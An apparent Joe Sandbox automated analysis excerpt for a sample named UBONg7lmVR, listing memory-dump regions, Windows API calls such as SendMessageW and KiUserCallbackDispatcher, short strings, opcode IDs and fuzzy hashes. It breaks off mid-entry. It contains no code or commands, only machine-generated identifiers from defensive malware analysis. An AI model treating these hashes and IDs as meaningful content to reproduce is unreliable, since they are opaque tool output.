                                                  • Instruction ID: 31c92b4e182994041cc06abe4d4d38c543d13038f74a9b9f33f441851e09a088
                                                  • Opcode Fuzzy Hash: 1c880365a8d1b21f15b4191d8e2af948f50c471d7fea9231d97549fa3e68c08c
                                                  • Instruction Fuzzy Hash: E21126B5C00249DFDB10DF9AD984BEEBBF4FB48320F10802AE519A7250C378A944DF65
                                                  APIs
                                                  • PeekMessageW.USER32(?,?,?,?,?), ref: 0AD18B80
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3557744285.000000000AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AD10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ad10000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: MessagePeek
                                                  • String ID:
                                                  • API String ID: 2222842502-0
                                                  • Opcode ID: 70e8bc488a9b82537892fda4ebe33851fd85b32ef68eb60d5f648b4766f09b01
                                                  • Instruction ID: eb6387555f97f9fc8e95037f7986239b06ce311cd4524eb88720af6a9314859e
                                                  • Opcode Fuzzy Hash: 70e8bc488a9b82537892fda4ebe33851fd85b32ef68eb60d5f648b4766f09b01
                                                  • Instruction Fuzzy Hash: 5311F6B5C003499FDB10DF9AD984BDEBBF8FB48320F10842AE559A3251C378A544DFA5
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(?,?,?,?), ref: 0AD18E4D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3557744285.000000000AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AD10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ad10000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID:
                                                  • API String ID: 2492992576-0
                                                  • Opcode ID: a6b44634451c27daf5b9b28ffb75ccae8939b79dcbccbcb10b8b5c82c4e022db
                                                  • Instruction ID: d3951909fc2b908222b849d4843ed6fb384b0a72e6019005adaeeac47aecc4ca
                                                  • Opcode Fuzzy Hash: a6b44634451c27daf5b9b28ffb75ccae8939b79dcbccbcb10b8b5c82c4e022db
                                                  • Instruction Fuzzy Hash: 4611F3B5C102499FDB10DF9AD984BDEBBF8EB48310F11846AE819A3341D378A644CFA5
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(?,?,?,?), ref: 0AD18E4D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3557744285.000000000AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AD10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ad10000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID:
                                                  • API String ID: 2492992576-0
                                                  • Opcode ID: 0955a5f5c77eab60d9cb58b215c382326fa4b5ea7266ebe7c5fa95ed37528ba0
                                                  • Instruction ID: bcc61af12fce8c463b1f270b8d7b961286b75992f63e388ddf9c44abf5667a34
                                                  • Opcode Fuzzy Hash: 0955a5f5c77eab60d9cb58b215c382326fa4b5ea7266ebe7c5fa95ed37528ba0
                                                  • Instruction Fuzzy Hash: D211F3B58003499FDB10DF9AD884BDEFBF8EB48320F10846AE519A3241C378A544CFA5
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0B3AB327
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3559158420.000000000B3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b3a0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID:
                                                  • API String ID: 2492992576-0
                                                  • Opcode ID: e40027203626fddbdaf85596036f67415b292e6baf85403a114e905a79bc5746
                                                  • Instruction ID: 98c1ac792239e832f10ff7ceed951394236216736d6a197206347df28b6320c0
                                                  • Opcode Fuzzy Hash: e40027203626fddbdaf85596036f67415b292e6baf85403a114e905a79bc5746
                                                  • Instruction Fuzzy Hash: 60113A75800249CFDB20DF9AD445BEEFBF4EB48320F24806AD459A3240D338A644CFA0
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0B3AB327
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3559158420.000000000B3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b3a0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID:
                                                  • API String ID: 2492992576-0
                                                  • Opcode ID: 250bdd313136398a46d513b831f9988a9a08a54ec52bf54dd544ecd37b38e88b
                                                  • Instruction ID: 2bc8b245f5d5b9b96be7c93f4f8cab58424ddc0fda5b82dbbf0ada7059008afb
                                                  • Opcode Fuzzy Hash: 250bdd313136398a46d513b831f9988a9a08a54ec52bf54dd544ecd37b38e88b
                                                  • Instruction Fuzzy Hash: 3F110A758103498FDB10DF9AD445BEEFBF4EB48320F24846AD559A3241D738A644CFA5
                                                  APIs
                                                  • PostMessageW.USER32(?,?,?,?), ref: 05BDFB85
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3547924034.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5bd0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: MessagePost
                                                  • String ID:
                                                  • API String ID: 410705778-0
                                                  • Opcode ID: 3fc5dae9b912255932d4c56440708ce9083094a16965baa0a82eaba60ef0aba5
                                                  • Instruction ID: dd96566638d18b1f4e50b9bd7b5a7a182cc63aa9417ab9ded0c73c17056794a2
                                                  • Opcode Fuzzy Hash: 3fc5dae9b912255932d4c56440708ce9083094a16965baa0a82eaba60ef0aba5
                                                  • Instruction Fuzzy Hash: FA1106B68003499FDB10DF9AC885BEEFBF8FB48320F10845AE559A3241D378A544CFA5
                                                  APIs
                                                  • SetWindowLongW.USER32(?,FFFFFFF4,?), ref: 09852BB5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556650373.0000000009850000.00000040.00000800.00020000.00000000.sdmp, Offset: 09850000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9850000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: LongWindow
                                                  • String ID:
                                                  • API String ID: 1378638983-0
                                                  • Opcode ID: 6d6fe5aa4680c48e6d09c80316b977254cf56963ccc73c5ccad0c85c64a7a447
                                                  • Instruction ID: 728696d009fb0fd6ed2f17c1b68fc06bec9420d876f6c7d19bb4bd93f4863e05
                                                  • Opcode Fuzzy Hash: 6d6fe5aa4680c48e6d09c80316b977254cf56963ccc73c5ccad0c85c64a7a447
                                                  • Instruction Fuzzy Hash: 3211E3B5800249DFDB10DF99C589B9EBBF8EB88320F10845AE919A7340D378A944CFA5
                                                  APIs
                                                  • SendMessageW.USER32(?,00000018,00000001,?), ref: 05BDFF5D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3547924034.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5bd0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: c999bfc46ad147c1aba3855555bc52bab0ca2e169827fdf7da5d31a22f8f43dc
                                                  • Instruction ID: 5d2d4b415b4119996dba276d9fd27aa4b4fd3792022e836d1b9065c9b347036e
                                                  • Opcode Fuzzy Hash: c999bfc46ad147c1aba3855555bc52bab0ca2e169827fdf7da5d31a22f8f43dc
                                                  • Instruction Fuzzy Hash: CB11F5B58047889FDB10DF99C845BEEFBF8EB48310F10845AE519A7240D375A944CFA5
                                                  APIs
                                                  • PostMessageW.USER32(?,?,?,?), ref: 05BDFB85
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3547924034.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5bd0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: MessagePost
                                                  • String ID:
                                                  • API String ID: 410705778-0
                                                  • Opcode ID: 8c0b97015a2e099e4ef4427ca4317c80d7a73c642af2d6ab3c69818439f1bf4e
                                                  • Instruction ID: bae021822f9c7de9381d1a722a22b08923dc4b8b6595b6d3a257adca49ead4c3
                                                  • Opcode Fuzzy Hash: 8c0b97015a2e099e4ef4427ca4317c80d7a73c642af2d6ab3c69818439f1bf4e
                                                  • Instruction Fuzzy Hash: 691116B68003498FDB10DF99C585BEEBBF4FB48320F20845AD459A3241D374A684DFA0
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 05B4BFB6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3547802672.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b40000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: 56b8501798609fbc11ecd86a3fc7156d45f102797ccb9aed5245dc644469b51b
                                                  • Instruction ID: 1fb1d9992f3f703295b50f5089647e05bdefe22fbd7c2bb474f27f2b797f83bd
                                                  • Opcode Fuzzy Hash: 56b8501798609fbc11ecd86a3fc7156d45f102797ccb9aed5245dc644469b51b
                                                  • Instruction Fuzzy Hash: 22110FB6C007498FCB20DF9AC844A9EFBF4FB88220F10845AD519A7240D375A545CFA1
                                                  APIs
                                                  • SendMessageW.USER32(?,?,?,?), ref: 05BDD515
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3547924034.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5bd0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: ea563e8b54c937cc4e797ec33e1da1621c82a0acdfe767230c8594dc10d9a73a
                                                  • Instruction ID: c141c96e86f394f34a7254b42260c0b594622300366e881d233bc1fa7daa1978
                                                  • Opcode Fuzzy Hash: ea563e8b54c937cc4e797ec33e1da1621c82a0acdfe767230c8594dc10d9a73a
                                                  • Instruction Fuzzy Hash: 0611F5B58003499FDB10DF9AC945BDEFBF4FB48314F10844AE859A7210D375A544CFA1
                                                  APIs
                                                  • OleInitialize.OLE32(00000000), ref: 0AD12A7D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3557744285.000000000AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AD10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ad10000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: Initialize
                                                  • String ID:
                                                  • API String ID: 2538663250-0
                                                  • Opcode ID: 46d1a0025d93547e7da1c93ebe4ba6cd09ddd533ce09c3b8525b214ca353e930
                                                  • Instruction ID: 8847b2398eb78e5db2f3542fa39b2612f7d4fca90287562a43705fbf60c0eac8
                                                  • Opcode Fuzzy Hash: 46d1a0025d93547e7da1c93ebe4ba6cd09ddd533ce09c3b8525b214ca353e930
                                                  • Instruction Fuzzy Hash: FA1106B58003489FCB20DF9AD485BDEFBF4EB48310F108469D519A7300D379AA44CFA5
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(?), ref: 0AD18D98
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3557744285.000000000AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AD10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ad10000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID:
                                                  • API String ID: 2492992576-0
                                                  • Opcode ID: 0e79639f312131508c73ad49708a4ee2f4959e633d3d6596b23574cf811426fe
                                                  • Instruction ID: 8b45a98f99ac9542745fa83c463b463a6e4d486cefb4bf02b232d5b1806ec7cc
                                                  • Opcode Fuzzy Hash: 0e79639f312131508c73ad49708a4ee2f4959e633d3d6596b23574cf811426fe
                                                  • Instruction Fuzzy Hash: C71115B5810349DFDB10DF99D589BDEBBF4EB48320F20845AD959A7340D338A644CFA5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (uq
                                                  • API String ID: 0-224692576
                                                  • Opcode ID: b76e4cdea0f0bac30bb7c54bfae81ee1a7e94f66bfc729649389f5f8ab5125d6
                                                  • Instruction ID: 12d531d27f652bfef36908be210863c23b99dbca902ff947dacacb30c122692c
                                                  • Opcode Fuzzy Hash: b76e4cdea0f0bac30bb7c54bfae81ee1a7e94f66bfc729649389f5f8ab5125d6
                                                  • Instruction Fuzzy Hash: A691DB71A15248EFCB19DFA9D4486AEBFF2EF85300F14846EE456E7351CB349805CBA2
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3557744285.000000000AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AD10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ad10000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: DispatchMessage
                                                  • String ID:
                                                  • API String ID: 2061451462-0
                                                  • Opcode ID: e40cb3b9412a35e3b61a2344d42d6745100a8791bd66647bf4a83ad6fbc566d0
                                                  • Instruction ID: a46e85806fbc46a1b7b93e9afd1d53f0777db4dee32adcc0cfa661d239783731
                                                  • Opcode Fuzzy Hash: e40cb3b9412a35e3b61a2344d42d6745100a8791bd66647bf4a83ad6fbc566d0
                                                  • Instruction Fuzzy Hash: 7C11F2B5C006489FDB10DF9AD884ADEFBF4EB89310F11846AD419A7350D378A644CFA5
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(?), ref: 0AD18D98
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3557744285.000000000AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AD10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ad10000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID:
                                                  • API String ID: 2492992576-0
                                                  • Opcode ID: 66b7de743debabc171642cb2b93b11bf8992a780d0fd7bf19573e1bce5484000
                                                  • Instruction ID: 346916bcb57c03cf4961c9cf05fa5ade650eaf7b54502a7725225e534cbca287
                                                  • Opcode Fuzzy Hash: 66b7de743debabc171642cb2b93b11bf8992a780d0fd7bf19573e1bce5484000
                                                  • Instruction Fuzzy Hash: FA1103B58003499FDB10DF9AD985BDEBBF4EB48320F10841AD559A3240D338A544CFA5
                                                  APIs
                                                  • SendMessageW.USER32(?,?,?,?), ref: 05BDD515
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3547924034.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5bd0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: f91e71ffbce6c1adde793d0a0d179a029a10b565ea5f00d45490cee5ff4ab303
                                                  • Instruction ID: 6c88ffec25531786c798eb6fe62190a6ff519617a54ef14dc3cd0356d497bff0
                                                  • Opcode Fuzzy Hash: f91e71ffbce6c1adde793d0a0d179a029a10b565ea5f00d45490cee5ff4ab303
                                                  • Instruction Fuzzy Hash: FF11D0B58003499FDB10DF9AC889BDEFBF8FB48324F10845AE559A7240D375A944CFA5
                                                  APIs
                                                  • SendMessageW.USER32(?,00000018,00000001,?), ref: 05BDFF5D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3547924034.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5bd0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: 98247a6bfd132f39f8e9a7cb7f6ed4fa7266f9fa53d07f5f9d67203d816b9485
                                                  • Instruction ID: 4a164ec603030dcbf1bec15a985f31f4565e6b5102953df0b5c3888bf89a82e7
                                                  • Opcode Fuzzy Hash: 98247a6bfd132f39f8e9a7cb7f6ed4fa7266f9fa53d07f5f9d67203d816b9485
                                                  • Instruction Fuzzy Hash: BB11F2B58003889FDB10DF99C989BEEFBF4EB48310F20844AD519A7240D374A544CFA0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3557744285.000000000AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AD10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ad10000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: DispatchMessage
                                                  • String ID:
                                                  • API String ID: 2061451462-0
                                                  • Opcode ID: 53cd2e4ff6605f0a430f26d1031898b83c1cb08916dd5fc2550f8c4486fdc93f
                                                  • Instruction ID: 7aced873f5a378ea9038516832655bb1966732bb05ac7be8dc3e00b9b858c339
                                                  • Opcode Fuzzy Hash: 53cd2e4ff6605f0a430f26d1031898b83c1cb08916dd5fc2550f8c4486fdc93f
                                                  • Instruction Fuzzy Hash: B111CEB5C006499FCB10DF9AD884ADEFBF4EB88320F10842AD519A7350D378A644CFA5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Huq
                                                  • API String ID: 0-93357626
                                                  • Opcode ID: a8e929330287263312ce372cc3cc69cf486937e1a556f63cb9c2d891632bf216
                                                  • Instruction ID: eeb808033d50423be7d3ace24806b71917a8e467085051c954de5f86a28b4b67
                                                  • Opcode Fuzzy Hash: a8e929330287263312ce372cc3cc69cf486937e1a556f63cb9c2d891632bf216
                                                  • Instruction Fuzzy Hash: 63418E356046588FCF05DF68C9949AE7BF2EF89300F1584A9E906EB362DB35ED05CB60
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @
                                                  • API String ID: 0-2766056989
                                                  • Opcode ID: a6d3d08ef374969f02f2c18d369a1c475cd37738d93b57469e1dc0751dd28d4f
                                                  • Instruction ID: 2472580c16576844c090c877e8d95a89baec305a01b148a1b7c154e365bed417
                                                  • Opcode Fuzzy Hash: a6d3d08ef374969f02f2c18d369a1c475cd37738d93b57469e1dc0751dd28d4f
                                                  • Instruction Fuzzy Hash: CC21C131B142158FCF1AAB7C885457E7BF5AF89214B0880BDE509CB3A1CA36CC01C7A6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (uq
                                                  • API String ID: 0-224692576
                                                  • Opcode ID: 5854a1b3e2b1ceeed5a5e3c544e27bdb1def29156071b40f3cbddda7293c9cc0
                                                  • Instruction ID: 0189d9bb2cd1a9fa4bc243b67584826a8161e91ba181e048a5a6d11fc70b2259
                                                  • Opcode Fuzzy Hash: 5854a1b3e2b1ceeed5a5e3c544e27bdb1def29156071b40f3cbddda7293c9cc0
                                                  • Instruction Fuzzy Hash: 05112B36B192656FDF49A77C981857F3FF9DFC660031844AEE406C7342DD258C0683A1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Teqq
                                                  • API String ID: 0-974210879
                                                  • Opcode ID: 1e9bfbc70511486d781e34fb7db2c8dbf154c4443c79b5e06b82eff5b65ceb5b
                                                  • Instruction ID: 69242ea4d52aae6336dbbb01b5aa1234f2559532edb37897f3f3f125803f556d
                                                  • Opcode Fuzzy Hash: 1e9bfbc70511486d781e34fb7db2c8dbf154c4443c79b5e06b82eff5b65ceb5b
                                                  • Instruction Fuzzy Hash: F6115E71B1020A9BCF54EBB999505EFBAF6AF89310F14406DD505EB344EB319D05CBA1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @
                                                  • API String ID: 0-2766056989
                                                  • Opcode ID: 807ff81e18a89956e59c0691c8c8f67eff3948acfb95c9fc8f42a2da8b1ee791
                                                  • Instruction ID: 64c5b57fc7fea62623d32c0719a0e29682bdac89e48328a23e0ad9c73203295b
                                                  • Opcode Fuzzy Hash: 807ff81e18a89956e59c0691c8c8f67eff3948acfb95c9fc8f42a2da8b1ee791
                                                  • Instruction Fuzzy Hash: FB11A571B04215DBCF16AA6C88946BEB7A6EF95204F08807DE909DB340CB32C845C7E6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c6fa98bc79e3d502900ce3523e3718d1be57172c52c9b9379de25b1304a73007
                                                  • Instruction ID: 884a7c1fe0bab68dfa8ce1cf539d7925b0563716c2d35d399425335d55559ce9
                                                  • Opcode Fuzzy Hash: c6fa98bc79e3d502900ce3523e3718d1be57172c52c9b9379de25b1304a73007
                                                  • Instruction Fuzzy Hash: C362D2B0D21B41CFDF745F7489987ADB6B1AB56344F14891FE0FACA3A0EB3498458B42
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 65cdd743e6f983e4f828910e304810f14942db4b90ec8128cef75b94d5868709
                                                  • Instruction ID: 5f62962a55114c801eca5f9fd44e421eff6a73a5b2fcbbded93cde8234c2001a
                                                  • Opcode Fuzzy Hash: 65cdd743e6f983e4f828910e304810f14942db4b90ec8128cef75b94d5868709
                                                  • Instruction Fuzzy Hash: 41226EB0D25F42CFDB705F648A8879EB6B0AB15384F248D1FD0FACA365E73494868B45
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 86d112fe918daf8a4a59a8e21137978f5a23c1fcf9f66fa0d6fa325c28be232a
                                                  • Instruction ID: 570e2d58748c16d91d470dfc271a63bb09c5110d9aed09fa8f05d0e71f69f46e
                                                  • Opcode Fuzzy Hash: 86d112fe918daf8a4a59a8e21137978f5a23c1fcf9f66fa0d6fa325c28be232a
                                                  • Instruction Fuzzy Hash: BBD0923600E3E0AFCB0757708951951BFB1EF4B24475984DBE1C58F1B3C622482EDBA2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 350e50e619a0533d9b321c3f75536cc43a79fddffcc48df4e7748f07e69a9de5
                                                  • Instruction ID: 4b442437c59561c2740a97d1114bfdf3c4b189c901e6fe3f4b1b956051406434
                                                  • Opcode Fuzzy Hash: 350e50e619a0533d9b321c3f75536cc43a79fddffcc48df4e7748f07e69a9de5
                                                  • Instruction Fuzzy Hash: 97816035A10209DFCF04DFA4E8989ADBBB5FF89305F148569E502EB364DB70A945CF90
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 77dec266e9a1760a7c73e277452ea9a9190275b4ee0827cfdb04c042db9cdebc
                                                  • Instruction ID: f9be6e02672e9258b937dddfa5824365ddce273d7274a382c6f61225edeccaad
                                                  • Opcode Fuzzy Hash: 77dec266e9a1760a7c73e277452ea9a9190275b4ee0827cfdb04c042db9cdebc
                                                  • Instruction Fuzzy Hash: A771E675A107059FCB24CFBDD98869EBBF1FB48210B148A2EE85AD3740DB34E9448B51
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 48874a9f09911f5649299ad67a01e5d30758675e5a16f587b2f8a96aa308fe0d
                                                  • Instruction ID: 13f0d04561e393d7364f1de0c618b13848be680a3936da206039798f5c90965f
                                                  • Opcode Fuzzy Hash: 48874a9f09911f5649299ad67a01e5d30758675e5a16f587b2f8a96aa308fe0d
                                                  • Instruction Fuzzy Hash: 3E714B35A102099FDF18DFA8C8596AEBBB1FF88300F14816DE946E7351EB349945CB91
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 51807a2bd18689931e6481add5a6cec569c87adf1ee9c617a203ebc130f607d5
                                                  • Instruction ID: 938400ca6ff86a1e61a339ade8431848a3232d37fe01fedd5af68c5f9c2c7d7b
                                                  • Opcode Fuzzy Hash: 51807a2bd18689931e6481add5a6cec569c87adf1ee9c617a203ebc130f607d5
                                                  • Instruction Fuzzy Hash: 86516A707102148FCB24DF68C484B6ABBE6BF98705F18456DE40ADB3A1DB75EC41CB91
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 56d62e8b4122aaf7e12cdfc9924ed65f77f7725ac648497f0579df2d8bce479a
                                                  • Instruction ID: 293cf79f13ac8249c03240ef9e4ea1f9881e7a86bb3de69abf4fa3a6678d2fa2
                                                  • Opcode Fuzzy Hash: 56d62e8b4122aaf7e12cdfc9924ed65f77f7725ac648497f0579df2d8bce479a
                                                  • Instruction Fuzzy Hash: E2611931A10609DFCF14DFA9C454A9DBBF1FF88310F158169E809AB360DB71AD85CB90
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
